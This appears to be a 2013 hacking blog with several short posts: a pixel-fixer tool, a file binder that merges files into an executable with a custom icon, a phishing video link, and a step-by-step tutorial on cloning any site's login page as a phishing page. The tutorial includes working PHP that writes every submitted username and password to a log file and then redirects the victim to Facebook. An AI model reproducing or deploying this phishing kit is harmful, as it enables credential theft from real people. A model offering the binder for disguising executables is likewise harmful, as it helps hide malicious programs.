Sunday, 10 November 2013

PixelFix (Source Code)





  • This program can help you fix dead or stuck pixels by quickly changing the color of the malfunctioning pixels. It can also help you locate dead or stuck pixels !
  • Please note that there is no warranty on the result but it can’t hurt to try !
  • You can download this program by clicking the download button below.
  • This program is 100% free. It is hosted on a dedicated server and does not contain any advertisements.


Requirements:
Platforms:
  • Windows Vista
  • Windows 7
  • Windows 8
  • Windows 8.1
                                       
                       DOWNLOAD (source code)

Thanks for visiting my BLOG!!

PixelFix + Source code




  • This program can help you fix dead or stuck pixels by quickly changing the color of the malfunctioning pixels. It can also help you locate dead or stuck pixels !
  • Please note that there is no warranty on the result but it can’t hurt to try !
  • You can download this program by clicking the download button below.
  • This program is 100% free. It is hosted on a dedicated server and does not contain any advertisements.


Requirements:
Platforms:
  • Windows Vista
  • Windows 7
  • Windows 8
  • Windows 8.1
                                          
                                                 DOWNLOAD

                                       (click here for source code)


Thanks for visiting my BLOG!!

Ultimate File Binder – Free file binder (Source Code)

Information:

  • Ultimate File Binder is a free and easy to use file binder. You can bind any type of file (.jpg, .png, .exe, .com, .bat,...) and compile it into an executable file (.exe). You can even adjust the icon of the compiled executable file ! The tool has a very simple, yet elegant design. As always, no surprises and no virusses.
Screenshot:



Requirements:


  • .NET Framework v3.5 for the tool



  • Minimum .NET Framework v2.0 for the compiled executable


  •                                    DOWNLOAD (source code)


    Thanks for visiting my BLOG!

    Ultimate File Binder - Bind your files + Source Code

    Information:
    • Ultimate File Binder is a free and easy to use file binder. You can bind any type of file (.jpg, .png, .exe, .com, .bat,...) and compile it into an executable file (.exe). You can even adjust the icon of the compiled executable file ! The tool has a very simple, yet elegant design. As always, no surprises and no virusses.
    Screenshots:








                                                           DOWNLOAD


    Click here for the source codes or click the download button above to download the application.


    Requirements:



  • .NET Framework v3.5 for the tool




  • Minimum .NET Framework v2.0 for the compiled executable

  • Thanks for visiting my BLOG!

    Saturday, 9 November 2013

    How to use Phishing pages




    Many of guys asked me how to use phishing pages so this post is only for Beginners....


    See the video below:


    How to use Phishing pages from 1.13.19.Hacker on Vimeo.


    If you are having probelm then you can download the video from the below link:

                                 DOWNLOAD

    Thanks 4 visiting my BLOG!!

    Friday, 8 November 2013

    Make Phishing page of Any Site [TUT]

    Hello, I'm here to make a small Tutorial that how you Make Phishing Page of any Site!!


    OK so lets get started...




                                         TAKING SOURCE:

    •   go on the site's Login page which you will use as your Phishing page. Right click on site and Click "View Page Source" Click on the Source box and Press CTRL + A to Select all source. Now we have the page source. Now make a file name it index.php!

                         Making Phishing page Work:

           To make phishing page work, I'll explain below.
    • Make a file index.php and copy the Source code of site you want to Phish.
    • Now edit the phishing page and Press CTRL + F and find action= or action 
    • Now Replacing the URL type action.php it might look like this:

                                                                                Code:
                                   action="action.php"



                          Keywords Copier:

    • Now make a file call it action.php and Copy the source code below and paste in it.

                                       Code:
    <?php
    header("Location: http://www.facebook.com");
    $handle = fopen("logs.html", "a");
    foreach($_POST as $variable => $value)
    {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fwrite($handle, "<hr />");
    fclose($handle);
    exit;
    ?>

    • Now, make a empty file call it logs.html , Now when you are done upload these all files to your webhost open the index.php and for testing type in random username/email and pass. now open the logs.html in your site http://www.forexample.com/logs.html and you'll see all the info over there! Thats it end of tutorial Smile....

    If you are having problem , you can watch the video of this from the below link:

                                  WATCH ONLINE


    I think it will be nice Tutorial...

    Thanks 4 visiting my BLOG!!

    Create Your Own Forum Script [PHP]

    MyBB Forum:



    Screenshot:


    If you want to create your own forum then you can download the forum script from the below link:

                                      DOWNLOAD

    Note:

    • You only have to first install your forum script.

    • You can do this by using this address:

                         www.yourwebsite.com/install

    Thanks 4 visiting my BLOG!!!